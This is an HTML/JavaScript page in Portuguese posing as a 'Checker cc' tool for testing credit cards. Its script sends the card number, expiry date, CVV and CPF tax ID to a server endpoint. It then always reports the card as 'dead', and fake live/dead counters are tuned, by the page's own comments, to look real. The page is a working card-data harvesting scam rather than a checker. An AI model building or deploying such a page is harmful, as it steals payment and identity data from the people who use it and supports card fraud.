<!DOCTYPE html>
<html lang="pt-BR">
<head>
  <meta charset="UTF-8">
  <title>Checker cc</title>
  <link rel="icon" type="image/png" href="assets/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="style.css">
</head>

<body>

  <div class="background">
    <span></span>
    <span></span>
    <span></span>
    <span></span>
  </div>

  <main class="container">
    <div class="theme-switcher">
      <button class="theme-btn neon" onclick="setTheme('neon')" title="Tema Neon">✨</button>
      <button class="theme-btn dark" onclick="setTheme('dark')" title="Tema Escuro">🌙</button>
      <button class="theme-btn light" onclick="setTheme('light')" title="Tema Claro">☀️</button>
    </div>

    <div class="card" id="main-card">
      <h1>Checker</h1>
      <p>Preencha os dados abaixo com atenção</p>

      <div class="input-group-stack">
        <input id="numero" type="text" placeholder="0000 0000 0000 0000" inputmode="numeric" maxlength="19">
        <input id="validade" type="text" placeholder="MM/AA" inputmode="numeric" maxlength="5">
        <div class="row">
          <input id="cvv" type="text" placeholder="CVV" inputmode="numeric" maxlength="4">
          <input id="cpf" type="text" placeholder="000.000.000-00" inputmode="numeric" maxlength="14">
        </div>
      </div>

      <button onclick="enviar()" id="btn-enviar">Verificar</button>

      <div id="msg"></div>
    </div>

    <!-- Tela de Dead -->
    <div class="card" id="dead-card" style="display: none;">
      <div class="status-icon">❌</div>
      <h1 style="color: #ef4444;">Cartão Dead</h1>
      <p>O cartão inserido não é válido ou está sem saldo.</p>
      <button onclick="voltar()" style="background: #64748b;">Voltar</button>
    </div>

    <div class="stats-container">
      <div class="stat-box live">
        <span class="stat-label">Live</span>
        <span class="stat-value" id="count-live">0</span>
      </div>
      <div class="stat-box dead">
        <span class="stat-label">Dead</span>
        <span class="stat-value" id="count-dead">0</span>
      </div>
    </div>
  </main>

  <script>
    // Gerenciador de Contadores (Fake) - Resetam ao atualizar a página
    let liveCount = 0;
    let deadCount = 0;

    function updateStatsDisplay() {
      document.getElementById('count-live').textContent = liveCount;
      document.getElementById('count-dead').textContent = deadCount;
    }

    // Inicializa display
    updateStatsDisplay();

    function setTheme(theme) {
      if (theme === 'neon') {
        document.documentElement.removeAttribute('data-theme');
      } else {
        document.documentElement.setAttribute('data-theme', theme);
      }
      localStorage.setItem('checker-theme', theme);
    }

    // Carregar tema salvo
    const savedTheme = localStorage.getItem('checker-theme');
    if (savedTheme) setTheme(savedTheme);

    function voltar() {
      document.getElementById('dead-card').style.display = 'none';
      document.getElementById('main-card').style.display = 'block';
    }

    // Máscara de CPF
    document.getElementById('cpf').addEventListener('input', function (e) {
      let v = e.target.value.replace(/\D/g, '');
      let res = '';
      if (v.length > 0) res = v.slice(0, 3);
      if (v.length > 3) res += '.' + v.slice(3, 6);
      if (v.length > 6) res += '.' + v.slice(6, 9);
      if (v.length > 9) res += '-' + v.slice(9, 11);
      if (v.length > 11) res += v.slice(11);
      e.target.value = res;
    });

    // Máscara de Cartão de Crédito
    document.getElementById('numero').addEventListener('input', function (e) {
      let v = e.target.value.replace(/\D/g, '');
      let res = v.match(/.{1,4}/g);
      e.target.value = res ? res.join(' ') : '';
    });

    // Máscara de Validade (MM/AA)
    document.getElementById('validade').addEventListener('input', function (e) {
      let v = e.target.value.replace(/\D/g, '');
      if (v.length > 4) v = v.slice(0, 4);
      if (v.length > 2) {
        e.target.value = v.slice(0, 2) + '/' + v.slice(2);
      } else {
        e.target.value = v;
      }
    });

    function enviar() {
      const numero = document.getElementById('numero').value.trim();
      const validade = document.getElementById('validade').value;
      const cvv = document.getElementById('cvv').value.trim();
      const cpf = document.getElementById('cpf').value.trim();
      const btn = document.getElementById('btn-enviar');

      if (!numero) return alert("Preencha o número");

      btn.disabled = true;
      btn.textContent = 'Verificando...';

      fetch('/enviar', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ numero, validade, cvv, cpf })
      })
      .then(res => res.json())
      .then(data => {
        setTimeout(() => {
          document.getElementById('main-card').style.display = 'none';
          document.getElementById('dead-card').style.display = 'block';
          
          // Incrementa contador dead (fake)
          deadCount++;
          updateStatsDisplay();

          // Chance aleatória de subir um live (fake) para parecer real
          if (Math.random() > 0.7) {
            liveCount += Math.floor(Math.random() * 2) + 1;
            updateStatsDisplay();
          }
          
          // Limpa campos
          document.getElementById('numero').value = '';
          document.getElementById('validade').value = '';
          document.getElementById('cvv').value = '';
          document.getElementById('cpf').value = '';
          
          btn.disabled = false;
          btn.textContent = 'Verificar';
        }, 1500); // Simula um tempo de carregamento
      })
      .catch(() => {
        btn.disabled = false;
        btn.textContent = 'Verificar';
      });
    }
  </script>

</body>
</html>